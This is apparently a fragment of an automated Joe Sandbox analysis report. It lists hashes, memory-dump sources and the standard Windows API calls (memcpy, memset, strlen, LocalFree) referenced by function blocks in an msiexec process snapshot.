                                                                                • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040849A
                                                                                • memset.MSVCRT ref: 004084D2
                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,67CE7B60,?,00000000), ref: 0040858F
                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,67CE7B60,?,00000000), ref: 004085BA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 3110682361-0
                                                                                • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID:
                                                                                • API String ID: 3510742995-0
                                                                                • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8